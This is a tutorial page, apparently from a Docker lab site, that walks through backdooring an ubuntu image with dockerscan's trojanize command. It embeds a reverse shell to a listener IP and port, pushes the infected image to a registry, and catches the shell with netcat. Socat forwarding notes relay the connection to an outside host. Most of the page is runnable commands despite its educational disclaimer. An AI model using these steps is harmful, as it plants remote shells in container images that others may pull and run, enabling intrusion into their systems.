dockerscan

Creating a Reverse Shell Backdoor in a Docker Container (using dockerscan)

Disclaimer: This document describes techniques that can be used to create backdoors in Docker images. This information is provided for educational and research purposes only, to understand potential attack vectors and how such tools might work. Do not use these techniques for any malicious activities or on systems you do not have explicit permission to test. Unauthorized access to computer systems is illegal.

This guide demonstrates a process using a conceptual dockerscan tool to modify a Docker image and embed a reverse shell.

1. Prerequisites

Install Docker: If Docker is not already installed on your machine:

curl https://get.docker.com/ | sh
# Follow any post-installation steps, like adding your user to the 'docker' group.

Prepare Target Image: Choose an image you want to backdoor and save it as a .tar file. For this example, we use ubuntu:latest.
```
docker pull ubuntu:latest
# Ensure you are in your working directory before saving
docker save ubuntu:latest -o image.tar
```
This image.tar file will be used as input for the backdooring process.

2. Building the `dockerscan` Utility Image

This step involves creating a Docker image that contains the dockerscan tool itself.

Create a Dockerfile: In a new directory, create a file named Dockerfile with the following content:

FROM ubuntu
RUN apt-get update && \
    apt-get install -y python3-pip && \
    rm -rf /var/lib/apt/lists/*

# Upgrade pip and install Python dependencies
# Note: Pinning setuptools and reinstalling requests might be for specific compatibility.
RUN python3 -m pip install -U pip && \
    python3 -m pip install urllib3 utils && \
    python3 -m pip install setuptools==58 && \
    python3 -m pip install dockerscan && \
    python3 -m pip uninstall -y requests && \
    python3 -m pip install requests

# The CMD will take the input image, listener IP and PORT, and output an infected image.
# The input image.tar is expected to be in /image/image.tar inside the container.
CMD ["dockerscan", "image", "modify", "trojanize", "/image/image.tar", "-l", "$IP", "-p", "$PORT", "-o", "/image/image_infected.tar"]

(Combined RUN layers for apt and pip where logical. Changed CMD to JSON array format for clarity.)

Build the dockerscan image: Navigate to the directory containing this Dockerfile.
```
docker build -t xxradar/dockerscan .
```
(Corrected "iamge" to "image" in original heading, now part of this section.)

3. Creating the Infected Image

Now, run the xxradar/dockerscan container. It will mount your current working directory (which should contain image.tar) and use the dockerscan tool inside the container to create image_infected.tar.

# Ensure 'image.tar' (e.g., saved ubuntu:latest) is in your current directory ($PWD).
# Replace 10.10.10.10 and 7777 with your listener's IP and port.
docker run --rm -it \
    -v "$PWD:/image" \
    -e IP=10.10.10.10 \
    -e PORT=7777 \
    xxradar/dockerscan

(Added --rm. Clarified that image.tar must be in $PWD.) After this command completes, you should have image_infected.tar in your current directory.

4. Loading, Tagging, and Pushing the Infected Image

Load the infected image:
```
docker load -i image_infected.tar
```
Identify and Tag the Loaded Image: Loading an image from a tar file might result in an image with a name like <none>:<none> or it might retain its original name (e.g., ubuntu:latest). You need to identify it to tag it correctly.
```
docker images
# Look for the newly loaded image. It might be identifiable by its recent creation time
# or if it replaced the original 'ubuntu:latest'.
```
Important: If docker load loads the image with the same name as your original (e.g., ubuntu:latest), that local tag now points to the infected version. Be cautious. Tag the loaded image for pushing to a registry. Ensure you use a new, distinct tag.
```
# If the loaded image is now 'ubuntu:latest' (infected):
docker tag ubuntu:latest xxradar/ubuntu_infected:lab79
# Or, if it loaded with a specific ID and no clear name/tag:
# docker tag <LOADED_IMAGE_ID> xxradar/ubuntu_infected:lab79
```
(Clarified image identification after load. Changed example tag to lab79 to avoid confusion with version numbers.)

Push the infected image (Optional):

# docker login -u <your_docker_username> # If not already logged in
docker push xxradar/ubuntu_infected:lab79

5. Setting up the Listener

On a server that will receive the reverse shell (your "control server"), start a netcat listener on the IP and port you specified when creating the infected image (e.g., 10.10.10.10 port 7777).

# On your control server (e.g., where IP is 10.10.10.10)
nc -lvnp 7777

(Added -v and -n to nc for verbosity and no DNS, -p is often not needed if port is the last arg but good for clarity.)

6. Running the Infected Container

Now, run the infected image on any target machine where you have Docker access. When this container starts, it should attempt to connect back to your netcat listener.

# On a target machine (or your local machine for testing)
docker run -it --rm xxradar/ubuntu_infected:lab79

(Added --rm.)

7. Post-Exploitation (Control Server)

If the reverse shell connects successfully, you should see a connection on your netcat listener. You can then type commands to be executed inside the infected container.

# (Commands typed into the netcat listener on the control server)
whoami
ls -la /
# ... etc.

8. Advanced: Port Forwarding with `socat` (Notes from Original)

If your listener is not directly accessible (e.g., it's behind NAT/firewall), you might use socat for port forwarding. These are notes from the original document.

Forwarding to a specific internal IP: This command listens on port 7777 on all interfaces and forwards traffic to xxxxxx:7777.
```
# socat TCP-LISTEN:7777,fork TCP:xxxxxx:7777 &
```
Forwarding to a DNS name:
```
# socat TCP-LISTEN:7777,fork TCP:bd.kubiosec.tech:7777 &
```
(Marked as notes and kept original placeholders.)

Home

Previousdocker_namespaces_explained Nextgetting_started_with_docker

Last updated 6 months ago